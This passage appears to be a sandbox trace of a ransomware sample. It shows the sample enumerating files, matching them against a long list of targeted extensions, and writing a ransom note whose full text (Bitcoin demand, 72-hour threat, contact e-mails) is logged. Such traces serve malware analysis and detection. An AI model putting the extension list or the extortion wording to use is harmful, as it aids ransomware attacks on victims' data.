	[0177.377] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="3CCD5499-87A8-4B10-A215-608888DD3B55.vsch", cAlternateFileName="3CCD54~1.VSC")) returned 1
	[0177.377] lstrcmpW (lpString1="3CCD5499-87A8-4B10-A215-608888DD3B55.vsch", lpString2="..") returned 1
	[0177.377] lstrcmpW (lpString1="3CCD5499-87A8-4B10-A215-608888DD3B55.vsch", lpString2=".") returned 1
	[0177.377] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\") returned="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\"
	[0177.377] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", lpString2="3CCD5499-87A8-4B10-A215-608888DD3B55.vsch" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch") returned="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch"
	[0177.377] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch") returned 113
	[0177.377] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.377] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch", cchLength=0x71 | out: lpsz="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch") returned 0x71
	[0177.377] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.378] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.378] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch" | out: lpString1="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch") returned="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch"
	[0177.378] lstrlenW (lpString="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch") returned 113
	[0177.378] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.378] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.378] StrStrW (lpFirst=".vsch", lpSrch=".") returned=".vsch"
	[0177.378] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.379] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".vsch") returned 0x0
	[0177.379] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Policy.vpol", cAlternateFileName="POLICY~1.VPO")) returned 1
	[0177.379] lstrcmpW (lpString1="Policy.vpol", lpString2="..") returned 1
	[0177.379] lstrcmpW (lpString1="Policy.vpol", lpString2=".") returned 1
	[0177.379] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\") returned="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\"
	[0177.379] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", lpString2="Policy.vpol" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol") returned="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol"
	[0177.379] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol") returned 83
	[0177.380] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.380] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol", cchLength=0x53 | out: lpsz="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol") returned 0x53
	[0177.380] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.380] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.380] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol" | out: lpString1="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol") returned="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol"
	[0177.380] lstrlenW (lpString="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\policy.vpol") returned 83
	[0177.380] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.381] StrStrW (lpFirst=".vpol", lpSrch=".") returned=".vpol"
	[0177.381] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.381] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".vpol") returned 0x0
	[0177.381] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Policy.vpol", cAlternateFileName="POLICY~1.VPO")) returned 0
	[0177.381] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0177.381] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0177.382] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204") returned="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204"
	[0177.382] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\*.*"
	[0177.382] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.382] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.383] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\HELP_DECRYPT_YOUR_FILES.TXT") returned 99
	[0177.383] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0177.384] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0177.384] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0177.387] CloseHandle (hObject=0x388) returned 1
	[0177.387] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.387] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
